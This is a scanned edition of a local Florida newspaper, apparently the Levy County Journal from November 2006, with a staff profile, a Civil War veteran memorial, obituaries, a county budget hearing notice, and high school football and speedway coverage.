I feel our role is important because this paper provides an unbiased account of what is happening in local government, as well as other community activities and happenings of interest to all age groups of Levy Countians. We try to provide the facts and let readers draw their own conclusions, not tell you what we think you should feel. Some may feel that since we show both sides of an issue, we might be trying to change their view on something they don't like, but the fact is we are simply presenting both sides of a story as it has been presented to us. If we didn't do this, many people would be in the dark about what is going on in their city and county governments that will affect them positively or negatively. We also provide a very reasonable way for folks to advertise their businesses and services. This paper is also the legal organ of Levy County, where we publish legal notices and advertisements that are of concern and interest to many.

What is your favorite part of the Levy County Journal?
I like different sections at different times; whatever is of interest to me that week. One week, it might be Carolyn's opinion piece, or an editorial written by a concerned citizen. The next week it might be news about the Suwannee River Fair, or high school football. Though our paper could be viewed as "small" in comparison to others, it has a broad scope for its size.

What do you like about living in Levy County?
I love the beauty of the country, the peace, the quiet, the wildlife, the fact that this is still a farming/ranching community, the people, the gatherings and events. I love being able to look up at night and actually see millions of stars, even the Milky Way! I like the fact that you can go to a seafood festival one weekend, canoe on the Suwannee another, ride your horses, bike the trails, take in the Quilt Museum, eat at wonderful restaurants, plant a garden, go to church, take in a play, root for your favorite high school team, get sloppy with free watermelon...the list is endless. Or you can simply stay at home and be lazy!

What is the biggest risk you have taken?
I have never considered myself a risk-taker; I like the safety of sure things. But in looking back over my life I have found that I really have taken several risks after all, and they were all big when I took them. The most recent one is that I chose to move up here to God's country and find a job that paid enough for me to survive, while my husband stayed and worked in Orlando until he could retire. I was fortunate to get a very good job with good pay and benefits, but after working in the job for a couple of months, I knew that the huge responsibility of it was too much for me to handle. I let my boss know about my decision (and my husband) and stayed for four more months and then searched for something else that would keep me afloat. I finally, and happily, landed here.

What is the best advice you've been given?
To place my trust in God to provide for me when I seem to have no means to provide for myself, and then not to worry about anything.

What are three things you tell people about yourself?
I have a widely varied work experience: I used to be a long-distance truck driver and traveled all over the country and into Canada; I used to own and work in a florist shop in a little town in Tennessee; and I was fully trained as a surgical technician, among many other different jobs.
What is the last movie you've seen?
Man of the Year with Robin Williams.

The last book you read?
Lincoln the Man by Edgar Lee Masters. I didn't finish it because it was a moderately difficult read and not my usual genre. It was written in 1931 about Abraham Lincoln by Mr. Masters, whose grandfather knew Lincoln, his family, friends and associates and lived where he had lived. Mr. Masters wrote an opposing view of Mr. Lincoln's life, both political and personal, than that which was made popular and elevated President Lincoln's memory to that of a demigod. I will try again to read this book. We only know what we are taught in school about certain subjects, and those having to do with persons and subjects from more than a century before are usually things that we don't question. I have learned that, even though something was taught to the masses, everything we are taught is not always strictly true!

The one TV show you can't miss?
The Young and the Restless. I know! I often wonder why I watch it myself. No one person could have as many problems of such horrific magnitude in their lives as all of the characters seem to have and not kill themselves! Some days I tell myself that I am fed up and will not watch it any more, but there I am the next day tuning in again! I am weak...WEAK!

Meet the Press: Robin Heath, Office Manager. Original hometown: Orlando.

Bronson UMC plans holiday service
Bronson United Methodist Church will hold a Thanksgiving service on Wednesday, Nov. 22 at 7 p.m. Pastor Mario Chacon welcomes the community to attend.

YOUR VIEW, continued from page 4
... treatment system further inland after one is constructed by either the county or the municipalities. I would suggest that this won't take 20 years, as one writer suggested, if Yankeetown's leaders make it a priority to protect the environment from the harmful effects of failing septic systems.
Many of the residents we have spoken with are looking ...

North, South honor Peterson for service during War Between the States
BY CAROLYN RISNER, MANAGING EDITOR
Under an ancient cedar tree draped with Spanish moss, once warring factions came together Saturday to honor one of their own. Timothy Peterson, a veteran who served in the War Between the States on both sides, was memorialized at Sand Pond Cemetery in the Tidewater region of South Levy County by re-enactors of the Sons of Confederate Veterans and Sons of Union Veterans.
Peterson, born in Georgia in 1835, moved to Florida as a young man and married Celia Johnson. In 1862, he enlisted in the 9th Florida Infantry, Company A, of the Confederate troops, and served until, for unknown reasons, he was found dazed and wandering in Key West. In April 1864, he was pressed into service for the Union Army and served with the 2nd Florida Cavalry, Company A, where he stayed until he was mustered out in Tallahassee in November 1865. It is recorded that Peterson participated in the Battles of Ft. Myers and Cedar Key during his service, according to Terry Hoye, a great-great-granddaughter. Peterson was also a recipient of the Distinguished Service Award.
Fifteen years later, Peterson married Sarah Jane Register and the family lived and prospered in the Tidewater region. The family cemetery at Sand Pond was begun in 1899 when Peterson's mother-in-law Sarah Ann was buried there. Peterson was also interred there in 1914.
Saturday nearly 100 people came from all across the state to pay their respects to the soldier and his service. During the half-hour ceremony a musket with fixed bayonet, a canteen with haversack and a knapsack, symbols of the army, were placed against Peterson's headstone.
A wreath of evergreen, symbolizing undying love for the comrades of war; a single red rose, a symbol of purity; and a wreath of grapevines, representing victory, were then placed alongside the army symbols. After readings of "The Blue and the Gray" and "The Unknown Dead," an honor guard fired a 21-gun salute with muskets and cannon as the haunting refrain of "Taps" echoed in the distance. "Taps are sounded. Lights are out - the soldier sleeps," said Commander Ed Page of the Ocala Sons of Union Veterans. Also participating in the memorial service were members of the Col. John Marshall Martin Camp 730 of the Sons of Confederate Veterans.

SYMBOLIC WREATHS were placed at the grave (1); a 21-gun salute pealed throughout the area (2); great-great-granddaughter Terry Hoye spoke of her ancestor's life (3); re-enactors stood watch during the ceremony (4). Journal photos by Carolyn Risner

PETERSON FAMILY matriarch, Eunita "Nita" Peterson Brass, accepts the flag on behalf of her grandfather Timothy's service during the War Between the States.

WOMEN DRESSED as war widows represented all the wives, mothers, sisters and fiancees of those who never returned from battle (5, 6), while Clayton Nichols, front, and Bill McClelland ready the cannon (7).

Page 6

Mary Ellis Bilbrey
Mrs. Mary Ellis Bilbrey, 59, of Old Town died Saturday, Nov. 11, 2006 at North Florida Regional Hospital after a long illness. Born in Orlando, she moved to Old Town from Winter Garden in 1987. She was the first female licensed water well contractor in the state of Florida and currently one of only two in the state. Bilbrey was a member of the Florida Ground Water Association and a member of the First Baptist Church of Old Town.
She is survived by her son, Brian Bilbrey of Tampa; daughter, Jennifer Storey of Old Town; sister, Patricia Pippin of Orlando; brothers, Steven Ellis of Winter Garden, James E. Ellis Jr. of Portland, Maine and Martin Ellis of Altamonte Springs; and grandchildren, Jay Tyler Storey and Jessica Storey. She was preceded in death by her husband Eddie Bilbrey. Funeral services were held Nov. 14 at the Rick Gooding Funeral Home Chapel with the Rev. Royce Hanshew officiating. Arrangements were under the care of the Rick Gooding Funeral Home, Cross City.

Freddy Davidson III
Frederick R. "Freddy" Davidson III, 48, of St. Petersburg, died Nov. 9, 2006 at North Side Hospital. Born in Gainesville, he was the son of the late F.T. and Margery Davidson. An automotive mechanic, he was a member of First Baptist Church, Chiefland. He enjoyed hunting, fishing and the outdoors. He loved people, his family and friends and his hometown of Chiefland. Survivors include two sisters, Sandra Roberts of Chiefland and Vicki Wolford of York, S.C.; four aunts, Betty Turner of Augusta, Ga., Amelia Cannon and Mary Alice Hardee, both of Chiefland, and Madge Reid of Texas; and several cousins. Funeral services were held Nov. 12 at Chiefland Cemetery. Arrangements were under the direction of Hiers-Baxley Funeral Services, Chiefland.

Shirley Haven Eberle
Shirley Haven Eberle, 69, of Port St. Lucie, died at home Wednesday, Nov. 8, 2006. Born May 27, 1937, she was the daughter of the late Hugh I. and Eunice (Stapleton) Haven of Gainesville. She lived most of her life in Windsor, Conn. Mrs. Eberle graduated from P.K. Yonge Laboratory School, Gainesville, in 1955 and attended the University of Florida. She was a member of the Hartford Audubon Society, a charter member of the Windsor Junior Women's Club, served on the town of Windsor Bicentennial Commission and the 350th Parade Committee, and was a former member of the Windsor Historical Society and the Civitan Club of Windsor.
She also served on the board of RIF (Reading Is Fundamental) in Windsor. Survivors include a daughter, Karen Lynne Eberle and her husband, Peter E. Mousseau, and a son, Frederick J. Eberle and his wife, Robyn J. Wahl, all of Windsor, and her special cousins, Carol and Terry Chaires of Wellington, and many dear friends. A private memorial service will be held on the Gulf in Cedar Key at a later date. In lieu of flowers, donations may be made to the American Cancer Society, 865 SE Monterey Commons Boulevard, Stuart, FL 34996. Yates Funeral Home, Port St. Lucie, was in charge of the arrangements.

Margaret Lee Fulmer
Margaret Lee Fulmer, 39, of Alachua, died at home Friday, Nov. 3, 2006. She was born in Jersey City, N.J. and resided in Alachua for eight years. She was a former beautician and enjoyed fishing. Her greatest joy in life was spending time with her daughter Brooke. She is survived by her daughter, Brooke of Gainesville; her ex-husband, Thane Fulmer of Gainesville; her parents, Richard and Carol Mudd of Bronson; her brother, Edward Oliver of High Springs; sister, Debra Cooper of High Springs; aunt, Nina Sullivan of Kansas City, Kan.; uncle John and aunt Linda Sullivan of Trenton; and Candace Shaw, who she counted as a dear friend and co-mother to her daughter.
She also has numerous nieces and nephews. In lieu of flowers, donations may be made to Brooke Fulmer, c/o Debra Cooper, 243 SE Old Bellamy Road, High Springs, FL 32643.

Mary Jobe Goddard
Mary Jobe Goddard, 81, of Archer died Monday, Nov. 6, 2006 at her home surrounded by loved ones. A Paris, Tenn. native, she was born Oct. 11, 1925. She was the daughter of the late Carl E. Compton and Myrtle I. Compton. She was a Baptist and retired from Krispy Kreme. Survivors include two sisters, Barbara Lee and Kathy Hunter, both of Paris, Tenn.; one brother, Barry Compton of Lexington, Ky.; two sons, Norman A. Parrish of Gainesville and Charles Lynn Goddard of Bronson, and daughter-in-law, Paula Goddard; two daughters, Janice Pinkston of Waldo and son-in-law, Wes Pinkston, and Mary Beth Brown of Archer and son-in-law, Brian Brown; and six grandchildren, John Alan Boone, Erikalynn Goddard, Katlin N. Brown, Nicole Lee, Julie Parrish and Chris Edwards. A private memorial was held at Haven Hospice Chapel. The family requests that expressions of sympathy be made as donations to E.T. York Hospice Care Center, 4200 NW 90th Blvd., Gainesville, FL 32606.

Annie Laurie Grisham
Annie Laurie Grisham, 82, of Jacksonville died Nov. 2, 2006 after a lengthy illness. She was born in Cedar Key on Sept. 14, 1924 and was a resident of Jacksonville since 1964. She retired from Riverside Hospital in 1966 with 26 years of service as a nurse's assistant. She is survived by her husband of 61 years, Edward Grisham; a sister, Lucille Connell of Chiefland; a son, Mark Grisham of Jacksonville; two daughters, Diane Taylor of Cedar Key and Sharon Shannon of Jacksonville; five grandchildren and six great-grandchildren. She was a member of the Normandy Ward of the Church of Jesus Christ of Latter-Day Saints. She loved music and dancing and danced with her husband on her 82nd birthday. Funeral services were held Nov. 7 at the Church of Jesus Christ of Latter-Day Saints in Jacksonville.
A graveside service was held at Cedar Key Cemetery Nov. 8. Funeral arrangements were under the direction of Fraser Funeral Home.

Fannie Eliza Holmes
Fannie Eliza Holmes, 94, of Otter Creek died Nov. 6, 2006 at her residence.

Page 7

She was born in Ellzey and had been a lifelong resident of Levy County. She was a member of the Otter Creek Baptist Church, where she served as a Sunday school teacher and clerk for the church and was in the choir. Her hobbies included sewing, gardening, reading and quilting. She was a homemaker. She was preceded in death by her husband, Buford H. Holmes, and grandsons Andrew and Wayne Butler. Her survivors include Donald and Mary Holmes of Bronson; Glyn and Pam Holmes of Chiefland; Mary Jonel Holmes of Otter Creek; Melba Tillis of Chiefland; Hilda Butler of Chiefland; sister-in-law Marie Meeks of Ellzey; 10 grandchildren and 19 great-grandchildren; and many nieces and nephews. Funeral services were held at the Otter Creek Baptist Church with Pastors Billy and Gene Keith officiating. Interment was in Rosemary Cemetery in Bronson. In lieu of flowers, make contributions to the Otter Creek Baptist Church building fund, P.O. Box 17, Otter Creek, FL 32683. Arrangements under the care of Hiers-Baxley Funeral Services of Chiefland.

Carla Swails
Carla Swails, 65, of Cross City died Wednesday, Nov. 8, 2006 at her home. She was born and reared in Trenton and moved to Cross City three years ago. She was a member of New Prospect Baptist Church, she loved crafts and sewing and she was also an accomplished pianist. She is survived by her mother, Ollie Mae Hardee of Trenton; son, Del Swails of Cross City; sister, Lillie Barron of Trenton; two grandchildren and five great-grandchildren. She was preceded in death by her husband, Edsel D. Swail Sr.
and brothers, Frank Gray Deen and Joseph Aubrey Deen. Funeral services were held Nov. 11 at New Prospect Baptist Church with the Rev. Billy Robson officiating. Burial followed at Bethel Baptist Church Cemetery in Trenton. Arrangements were under the care of the Rick Gooding Funeral Home, Cross City.

Barbara Lynn "Bobbe" Williams
Barbara Lynn "Bobbe" Williams of Old Town died at her residence on Saturday, Nov. 11, 2006. She was 58. She was born in Franklin, Penn. and was a homemaker and beautician. She enjoyed fishing, gardening, decorating, the outdoors and the sun. Survivors include her husband, Glenn Williams of Old Town; her parents, Douglas and Catherine Stewart of St. Cloud; two daughters, Shoni Stewart of Kissimmee and Amy Williams of Kissimmee; one son, Brian Williams of St. Cloud; two granddaughters, JingerLynn Steward of Old Town and Madysen Williams of St. Cloud; and one grandson, Trent Meets of Kissimmee. Memorial services are planned and will be announced at a later date. Arrangements were by Hiers-Baxley Funeral Services, Chiefland.

Photographs are published at no charge with obituaries. Ask your funeral director for assistance.
LEVY COUNTY JOURNAL - SPORTS & RECREATION - THURSDAY, NOVEMBER 16, 2006 - Page 8

Red Devils swim easily out of Shark Tank
BY NEAL FISHER, SPORTS WRITER

BROOKSVILLE - Williston scored a decisive opening round playoff victory against a talented Nature Coast team as they came, they saw and they walked out of Shark Tank Stadium with a 26-13 victory. But for the first quarter, the Red Devils seemed destined to struggle to keep up with their opponents' version of the option offense. In fact, at the end of the first 12 minutes, it appeared the game's outcome would hinge on whether or not the Red Devils could match the Sharks touchdown for touchdown.

"We've seen big plays to start games before," Williston coach Jamie Baker said. "The key is to keep the team confident and realize that there is still a lot of game left to play. After the first couple of series, the defense really locked them down. We put eight men in the box and while they still got their yards, it didn't hurt us. And when our defense plays well it takes a lot of pressure off of the offense. They can relax and it allowed us to get the option working."

And after the Red Devils' answer to an 80-yard scurry by the Sharks' freshman running back Tevin Drake on the first play from scrimmage was a Rodrigo Quezada field goal, the answer at that point was no. Then the Red Devils quickly found themselves in the position of struggling to match the home team's play and scores as the Sharks' Josh Ortiz completed a bullet pass to Stephen Pelaez on fourth-and-goal from the Williston 15 for a touchdown and the home team followed it with a defensive stop.
Fortunately for Williston, Baker's coaching that the game is four quarters long rang true as two plays in the early part of the second period gave the Red Devils the opportunity to reassert their will and game plan. With the Red Devils forced to punt after the Sharks' second score and trailing by a score of 13-3, Nature Coast committed a roughing-the-kicker penalty. With new life and the ball now at midfield, the Red Devils' get up and go, which had been so crucial during the regular season, forced its way into the game. It was highlighted by sophomore Courtney Days' coming-of-age performance.

THE RED DEVILS' defense ran the Sharks' offense inside out as they shut down the home team's running game. Journal photo by Neal Fisher

The flurry of punches, which the Red Devils quickly and directly unleashed, resulted in 23 unanswered points. It began with Days ripping off a 45-yard flash and dash. Following his blocking around the right end of the line, he busted through the first wave of the defense, his legs shifted into fifth gear and the play continued all the way to the Sharks' 6-yard line. On the next play, Mario Brown scored when the Red Devils went around the right end again. Six plays later, Drake fumbled the ball as the Williston defense, agitated by their early struggles, swarmed the running back and separated him from the ball with vigor.

With a new spirit and conviction the Red Devils went on a 10-play, 69-yard tear, which saw ball carriers break tackles and the offensive line put their mark on the game. The Red Devils made the most of the occasion by taking the lead for good with 2:34 left as Days struck from 14 yards out for his touchdown. Once again the play developed as it moved around the right side of the line.

"The offensive line blocked really well," quarterback Devin Timmons said. "They are healthy and showing that they can block. We knew Days was going to be good. We watch and play with him during practice.
"He always does well and with Minor playing less because of a knee injury we felt comfortable he would come through. I think we might have just wore them down with the running and our defense really motivated us." After gaining the lead, the Red Devils' defense neutralized Ortiz and Drake's fondness for making the big play. The defense forced five turnovers during the game, but four of them came in the second half. Days' older brother, Courtney, recovered two fumbles. But perhaps the most crucial of the turnovers came with 10:56 left in %he game., Ortiz dropped back to pass from the Sharks' 11. Williston's defense mauled the Sharks' offensive line and forced the quarterback to roll to his right. Under pressure, he threw the ball just a tad w ~. Journal photos by Neal Fisher HEAD COACH Jamie Baker, left, stalks the sidelines as his team rips off 27 con- secutive points while the Red Devils respond to the always animated instruc- tions of Coach Alan Baker, right. bit too high for his intended receiver, Preston Williams. The receiver touched the ball with his fingertips, but could not get a grip on it. The result was a tipped ball. Jiwan James had positioned himself in the right place at the right time and snagged the ball out of the air. He continued in full stride down the right hash mark the remaining 23 yards and entered the end zone untouched. With the jaw dropping play, the lead grew to 26-13 and the Sharks were all but done. The play was the fifth score of the season by the Red Devil's defense. "He [James] didn't have coverage responsibilities but he used his instincts," Baker said. "He simply makes plays." Williston's other score was a second 33-yard field goal by Quezada with 8:30 left in the third quarter. It extended the Red Devils' lead to 19-13. The kicker also booted four kickoffs into the end zone, helping Williston gain the field position advantage. 
While Williston committed its share of game-changing miscues, Baker acknowledged it boded well for his team that their turnovers were not in their end of the field. Nature Coast's turnovers, however, were in the Sharks' end of the field. Drake finished with 20 carries for 126 yards, but the Red Devils got another boost as they shut him down after his touchdown run. After carrying the ball only 21 times for 98 yards on the season, the -foot-10, 170-pound Days proved his team's versatility in its backfield and his readiness to step into the limelight. His final totals were 16 rushes for a game-high 160 yards. In wearing the Sharks' defense down, the Red Devils saw a repeat of what he has done all season. However, he answered the question of - See Win, Page 9

IT WAS a hard day's night for Courtney Days. In the end, though, his performance was a masterpiece. Journal photo by Neal Fisher

NOTICE OF BUDGET AMENDMENT HEARING
The Levy County Board of County Commissioners will hold a public hearing November 21, 2006 at 9:00 A.M. in the County Commissioners Meeting Room, Levy County Courthouse, 355 S. Court Street, Bronson, Florida, for the purpose of amending its FY 2005/2006 budgets for the General Revenue Fund, 911 Fund, Housing Recovery Fund, Fire Control Fund, and the Additional Court Cost Fund.
                                    General       911      Housing     Fire      Additional
                                    Revenue      Fund      Recovery   Control    Court Cost
                                     Fund                    Fund       Fund        Fund
ESTIMATED REVENUES:
  TAXES                           16,988,678          0          0          0           0
  LICENSES                           341,000          0          0          0           0
  INTERGOVERNMENTAL                2,568,112    378,670    538,000    676,000           0
  CHARGES FOR SERVICES               455,000    160,000          0          0      46,400
  FINES/FORFEITURES                   22,000          0          0          0           0
  MISCELLANEOUS                      549,455      3,565      3,500          0           0
  LESS: Statutory Reserve         (1,046,212)   (27,112)   (27,075)   (33,800)     (2,320)
TOTAL ESTIMATED REVENUES          19,878,033    515,123    514,425    642,200      44,080
NON-OPERATING REVENUES:
  Interfund Transfers                261,847    248,000          0     17,000           0
CASH BALANCES FORWARD              4,085,248          0          0     25,000     100,873
TOTAL REVENUES & BALANCES         24,225,128    763,123    514,425    684,200     144,953

EXPENDITURES & RESERVES:
  GENERAL GOVERNMENT               4,724,174          0          0          0           0
  PUBLIC SAFETY                    1,271,790    530,495          0    684,200           0
  PHYSICAL ENVIRONMENT               445,624          0          0          0           0
  TRANSPORTATION                           0          0          0          0           0
  ECONOMIC ENVIRONMENT               211,330          0    514,425          0           0
  HUMAN SERVICES                   1,874,104          0          0          0           0
  CULTURE/RECREATION                 966,998          0          0          0           0
  COURT RELATED                      150,200          0          0          0      49,234
TOTAL OPERATING EXPENDITURES       9,644,220    530,495    514,425    684,200      49,234
NON-OPERATING EXPENDITURES:
  Interfund Transfers             13,322,355    232,628          0          0      95,719
RESERVES                           1,258,553          0          0          0           0
TOTAL EXPENDITURES, TRANSFERS
  & RESERVES                      24,225,128    763,123    514,425    684,200     144,953

EVEN A BOTCHED snap on a PAT attempt failed to stop the Red Devil Express once it got rolling. Journal photo by Neal Fisher

Complete details of the amended budgets are available for public inspection at the Office of the Clerk of the Court, Levy County Courthouse, 355 S. Court Street, Bronson, Florida. Persons are advised if they decide to appeal any decisions made at these meetings/hearings, they will need a record of the proceedings and for such purpose, they may need to insure that a verbatim record of the proceedings is made, which includes testimony and evidence upon which the appeal is to be based.

Game of the Week
Williston (8-3) vs.
Eustis (9-2)
2005 score: did not play

Overview: Both teams played well during the second half of their first round playoff games last week to advance. Also, after both teams advanced to the second round of last year's playoffs, they entered this season's postseason as stronger and more experienced units. What the teams learned from last year's run was apparent last week as both teams rallied after falling behind early. They remained cool, calm and didn't panic as they worked out the kinks of getting their playoff legs under them. However, because of their loss to North Marion, Williston will be playing their second consecutive game on the road as a district runner-up. By all accounts, as one would expect at this point in the season, these two teams, although using different running styles, are evenly matched and this should be a close game.

Williston update: Williston used their regular season finale against Newberry to regain the momentum they had built throughout the first eight games of the season and they carried it into their first round date. While it took about a quarter for the offense to find fifth gear and the defense to put the clamps on the Sharks' offense, coach Jamie Baker's squad got on a roll and looked as good as they have all season. While their victory over the Panthers was far from a masterpiece, Williston played Red Devils' football and it showed just how potent an attack they have, both on offense and defense. The offensive and defensive lines are peaking at just the right time of the season. While the Red Devils are still having issues with slow starts and fumbles, the impact on the outcome of the game has been minimal. Baker pointed out that his team's experiences over the last two years have been the difference in those situations.

Coach speak: "This gives the kids an eight win season. So they are really motivated to win, because it is the first time in a really long time the school has had this many victories.
A game like this lets the state know Williston can play some football. Turnovers loomed large (against Nature Coast) and they will continue to loom large. I hope we don't fall behind, but the kids realize it isn't the end of the world. Eustis is a run-oriented team like us. They move well and are athletic. Their line-up is very speedy and that is how they overcome their lack of size."

What to look for: As is the case in any sport on any level, the playoffs mean the teams who qualify for the postseason like to dance with the girl they brought to the big event. This means there aren't a lot of surprises as to what the remaining teams will do, and they will rely on their strengths in their simplest forms. Or in other words, both teams will throw their best punches and see who is still standing at the end of the day.

- By Neal Fisher, Levy County Journal

For the Red Devils that is their noted option offense and a speed demon defense which forces quarterbacks into hurrying their decisions. The Eustis Panthers counter with a multiple formation offense that relies on misdirection and a 4-3 defense utilizing their speed as they force the action to the middle of the field.

The Red Devils' offense has been productive throughout the 2006 season. Propelled by its speed, the option running attack gained 251 yards in their first round victory and it seems to have come of age in the last few weeks. The Red Devils also move the ball using their speed. And as coach Baker alluded to, the passing attack is efficient enough to keep defenses off balance and gain big yards in one fell swoop, as their two completions against Nature Coast attest. Add to that the Red Devil defense's ability to use their speed to shut down opponents' offenses and create chaos in the backfield, and Williston seems to be hitting their stride at exactly the right time. In fact, the Red Devils' defense has scored 35 points this season.
There isn't much surprise as to what the Red Devils will try to do against Eustis, but coach Baker and his staff have been good at making adjustments throughout the season. Eustis presents an offense different than what the Red Devils have seen all season and adjustments will probably be needed. While not willing to discuss the situations that may require the coaches to anticipate making those adjustments, the team has confidence they can translate the changes into on-the-field success.

With Deonte Welch and Ivan Floyd filling in for injured players, the Red Devils have yet to miss a beat. Together the two freshmen made significant contributions over the last two weeks and proved the Red Devils' program can sustain player losses. However, Marquis Minor is expected to see more playing time this week. In his stead, Courtney Days and Welch gave Newberry and Nature Coast fits. With Minor back, Eustis will have to figure out a way to keep an eye on not just one runner, but all three backs, and limit their yardage. While hard work is required to learn the scheme and play at the same level as their predecessors, the running backs who replaced the opening day starters are so alike the team has been able to continue to gain yards. The running attack has also continued to roll throughout the season because of its offensive line. Throwing its speed around, it drives opponents off of the ball before they can gain their footing and creates those holes the backs run through.

Anatomy of a playoff victory
This week's Friday night under the lights.

Athlete of the Game
BY NEAL FISHER, SPORTS WRITER

Player of the game last week was Courtney Days, Williston High School (RB). Days, a sophomore, came up big for the Red Devils in their biggest game of the season. He rushed the ball 16 times for 160 yards and a touchdown as Williston rallied from an early 10-point deficit to score a first round victory over Nature Coast.
The sophomore made the most of his opportunities in spot duty during the regular season, but with Marquis Minor seeing limited action and the Sharks' defense challenging Days to beat them, he rose to the occasion in his first game as the team's

BY NEAL FISHER, SPORTS WRITER

Final Score: Williston 26, Nature Coast 13

Two games in one: The Sharks staked themselves to a 13-3 lead midway through the second quarter. But the Red Devils outscored the home team 23-0 over the last two and a half quarters to claim victory.

Game summary: After giving up long plays the first two times the Sharks took possession of the ball, which led to touchdowns, the Red Devils' defense stymied their option attack.

Key plays: 1) The Sharks committed a roughing-the-punter penalty at 11:35 of the second quarter after they had stopped the Red Devils from answering their second score. 2) The Sharks then fumbled the ball at 7:05 of the second quarter after the Red Devils took advantage of the roughing-the-punter penalty by scoring. 3) Jiwan James, in full stride, picked off a tipped pass and returned it 23 yards for a touchdown at 10:56 of the fourth quarter.

Why they were key plays: 1) The Sharks' offense scored two touchdowns on their first two possessions. With their defense holding the Red Devils to a lone field goal heading into the second quarter, the Sharks were poised to put Williston in a hole that would have been very difficult to overcome. The roughing-the-punter penalty allowed the Red Devils to regroup and snapped Nature Coast's stranglehold on stopping Williston's offense up to that point in the game. 2) After the Red Devils scored following the roughing-the-punter penalty, the Sharks still had the lead and they were still moving the ball. With the fumble, the Red Devil defense got the break they needed to stop the Sharks' offense, and it was proof that they had found the right adjustments required to stop the home team's offense.
3) The Red Devils were sitting on a 19-13 lead and while they had shut down the Sharks' offense since the second-quarter fumble, it was still capable of scoring. With James' interception, the Red Devils had a two-touchdown lead, allowing the visitors more freedom in their play and the comfort of running time off the clock without worrying about giving up the lead.

Win - Continued from page 8

...main man, as opposed to being called upon for spot duty. "My hat goes out to them [Williston]," said Nature Coast head coach Jamie Joyner. "We turned the ball over and they took advantage. That's what playoff football is all about." Williston (8-3) takes on Eustis (9-2) on the road in the second round of the playoffs tomorrow.

Game Summary
Williston      3  13  3  7  -  26
Nature Coast  13   0  0  0  -  13

1st Quarter: Nature Coast - Drake 80-yard run (kick good). Williston - Quezada 36-yard field goal. Nature Coast - Pelaez 15-yard touchdown pass from Ortiz (kick failed).
2nd Quarter: Williston - Brown 6-yard run (2-point attempt failed). Williston - Courtney Days 14-yard run (kick good).
3rd Quarter: Williston - Quezada 32-yard field goal.
4th Quarter: Williston - James 23-yard interception return (kick good).

Rushing: Williston 43-251; Days 16-160, Timmons 12-52, Minor 7-2, Brown 8-14, Floyd 3, Welch 4-1. Passing: Williston 2-9-50-0; Timmons 2-9-50-0. Receiving: Williston 2-50; Whilden 1-16, Welch 1-33.

Key defensive stat of the game: The Sharks turned the ball over four times on their own side of the field. While the Red Devils had five fumbles of their own, they recovered all of them and the potential disasters were on the opponents' side of the field. Also four of the Red
Devils' fumbles were in the second half, long after they had taken command of the game.

Page 9

Key offensive stat of the game: Courtney Days took over the majority of the rushing duties due to a knee injury to Marquis Minor. With 16 rushes for 125 yards, the Red Devils were able to give Minor some much needed rest and gave the Sharks yet another style of running to contend with.

Factors that produced the 23 unanswered points: 1) Both of the Red Devils' offensive touchdowns were scored running the ball behind the right side of the line. In fact, running the ball to the right side of the line was so productive the Red Devils gained approximately three quarters of their yardage running the ball to that side. 2) After giving up the two scores in the first half, the Red Devil defense settled down and caused all kinds of havoc for the Sharks' offense, including over 10 hurries of their all-district quarterback and the turnovers. 3) With James' interception giving the Red Devils a 13-point lead as the fourth quarter wound down, Williston did not attempt one pass while they successfully ran the clock out.

Congratulations Red Devils on your first playoff victory. Hit 'em hard Friday in Eustis! "Let it be said"

Page 10

Bronson Speedway ends season with metal twisting affair
BY NEAL FISHER, SPORTS WRITER

BRONSON - Fans packed the Bronson Motor Speedway on Saturday night as a slight chill in the air combined with the disposition of the night to send the 2006 season into the history books with style.
Highlighted by its annual end-of-the-season crash-o-rama, the 2006 finale was a slam-bam, fender-grinding and sheet-metal-twisting affair that saw everyone get something for their money. "It was a great show for the fans," Tommy Dunford, general manager of the track, said. "We thank Boondocks Grill for supporting us and the drivers and fans who also supported us during the 2006 season."

The events ranged from the annual crash-a-rama to some of the sport's more unique and lesser known races. Which brings up the question of why someone would think of them, and who would imagine sending these machines into this kind of combat?

However, in the spirit of Veterans Day, before any of the festivities began, our nation's veterans and those currently serving in the military were honored. Robert E. Lowyns of the Tri-County Marine Corps League and Keith Griffin of the National Guard were introduced during the presentation of our nation's flag and the national anthem. Cub Scout Troop 514 of Chiefland did the honors of holding the flag while saluting it along with the two servicemen.

With such a variety of oddities and novelties, the whirl of f-stops and flashes took center stage in the stands as the competitors put on a show of determination and excitement. The program snaked its way through an assortment of unique races having just about anything to do with the outdoors or the world of industry. The showpiece of those kinds of races was the figure 8 school bus contest. Tucked in between the daredevils' attempts for one last grasp at glory this season were an exhibition jump, a spin-out competition and the recognition of the speedway's 2006 champions. But perhaps the line-up's biggest attraction was the monster truck rally. Three trucks wowed and awed the crowd with a variety of moves over, under and through the dirt piles and destroyed cars. "The Monster Truck show was awesome," Dunford said. "It really stood out to watch what those machines can do."
This was after the audience had a chance to survey the machines and form their opinions first hand at the graceful power of the oversized trucks before the steel pounding action began. Added to the festivities of nerves of steel and gambling were the non-racing curiosities that made the night feel like it was a fair, among which were the world's largest pinball machine and cuisine that seemed to make everyone's taste buds water. When the smoke from the featured slashed and gashed carnage of all kinds and walks of life concluded with the demolition derby, the daredevils called it a night as they rode off into the sunset. But the most important effect was a season finale that gave everyone a full stomach and smiles as the fans filed out of the speedway. "It was great to see the stands full of fans as the season ended and we are happy with the way it came to a close."

Journal photos by Neal Fisher. WELL, THAT'S going to leave a stain.

"HEY, I thought we took the car to Maaco." After further review, there probably was little that could help this machine after the demolition derby.

THE BRONSON Motor Speedway honored its 2006 series champions during intermission.

Results
School Bus Figure 8s: 1. Robert Aaron 2. Dave Ross 3. Larry Harris
Enduro Winner: William Hinth
Roller Derby Winner: A.J. Northrup
Skid Car Race Winner: Joe Ringhiesen
Boat & Trailer Race Winner: Michael Gamon
Blindfold Race: A.J. Northrup
Reverse Race: Fred Judy
Demo Derby: Dave Westrich

Cooper takes the checkered flag

BY NEAL FISHER
SPORTS WRITER

OCALA-After a satisfying win at his home track last Saturday night, Robbie Cooper took to the banks of Ocala Speedway looking to close out the track's 2006 season with something to shout about. As the checkers waved, it was mission accomplished for the second consecutive week as Bronson's most famous racing product captured his fifth victory of the season in the track's open wheel modified division. "It is always nice to win the last race of the season," Cooper said. "There is some really great competition at Ocala Speedway and to be able to win five times is really an accomplishment. It is just really hard to win there. I think that the competition at Ocala is the best class of modifieds in the state and the track is the hardest to drive." With the victory Cooper moves into the fifth position in the series' final point standings. Being an up and coming driver, he splits his time racing in several series. Due to the different series, the Bronson driver missed several races the series ran, and he pointed out that he probably would have finished higher in the point standings. However, he was pleased with his fifth place finish considering it was his rookie year at the track. Unfortunately, his victory was short lived as he finished a disappointing seventh Saturday night in the race of champions at Desoto Speedway. "It was a real bad night and those kinds of nights are going to 